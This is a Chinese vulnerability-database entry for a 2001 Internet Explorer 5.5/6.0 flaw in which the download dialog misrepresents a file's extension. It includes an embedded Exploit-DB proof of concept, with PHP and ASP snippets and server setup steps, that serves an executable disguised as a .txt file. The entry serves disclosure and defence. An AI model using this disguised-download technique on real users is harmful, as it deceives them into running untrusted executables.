发布时间 :2001-11-26 00:00:00
修订时间 :2008-09-05 16:25:08

[原文]Internet Explorer 5.5 and 6.0 allows remote attackers to cause the File Download dialogue box to misrepresent the name of the file in the dialogue in a way that could fool users into thinking that the file type is safe to download.

[CNNVD]Internet Explorer漏洞(CNNVD-200111-035)

        Internet Explorer 5.5和6.0版本存在漏洞。远程攻击者可以利用该漏洞导致文件下载对话框误传对话框文件名,误导用户认为正在下载安全文件。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:ie:5.5Microsoft ie 5.5
cpe:/a:microsoft:ie:6.0Microsoft Internet Explorer 6.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1014IE File Download Dialog Deception Vulnerability

- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  XF  ie-file-download-ext-spoof(7636)
(VENDOR_ADVISORY)  BUGTRAQ  20011126 File extensions spoofable in MSIE download dialog

- 漏洞信息

Internet Explorer漏洞
高危 未知
2001-11-26 00:00:00 2005-05-02 00:00:00
        Internet Explorer 5.5和6.0版本存在漏洞。远程攻击者可以利用该漏洞导致文件下载对话框误传对话框文件名,误导用户认为正在下载安全文件。

- 公告与补丁


- 漏洞信息 (21164)

Microsoft Internet Explorer 5.5/6.0 Spoofable File Extensions Vulnerability (EDBID:21164)
windows remote
2001-11-26 Verified
0 StatiC
N/A [点击下载]

It is possible for a malicious webmaster, hosting files on an website, to spoof file extensions for users of Internet Explorer. For example, an .exe file can be made to look like a .txt (or other seemingly harmless file type) file in the Download dialog.

When including a certain string of characters between the filename and the actual file extension, IE will display the specified misleading file extension type.

The end result is that a malicious webmaster is able to entice a user to open or save arbitrary files to their local system.

* It has been reported that patched systems may still be vulnerable to this issue. If the attacker composes a .hta file, using the methods described above, it is possible for the malicious file to go undetected by patched systems. 

With an apache/php server add .txt to the already existing .php extension in the apache.conf file, so that apache will recognise .txt extensions as php script files.

1. Copy the real windows calc.exe from a windows system to the html root dir.

2. Copy the readme.txt file below to the same html root dir.

3. go to the url http://yourserver/readme.txt

You will see the same behavior mentioned in the previous alert.

FILE <readme.txt> BEGIN ----
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
FILE <readme.txt> END ----

"Jonathan G. Lampe" <> submitted this example in ASP for IIS webservers:


Const adTypeBinary = 1
Dim strFilePath

Response.ContentType = "application/octet-stream"
Response.AddHeader "Content-Disposition","attachment; filename=calc.exe"

strFilePath = Server.MapPath(".") & "\calc.exe"

Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Type = adTypeBinary
objStream.LoadFromFile strFilePath

Response.BinaryWrite objStream.Read

Set objStream = Nothing


- 漏洞信息

Microsoft IE Download Dialog File Extension Spoofing Weakness
Context Dependent Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

- 时间线

2001-11-26 Unknow
2001-11-26 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability. Check the vendor advisory or solution in the references section.

- 相关参考

- 漏洞作者

Unknown or Incomplete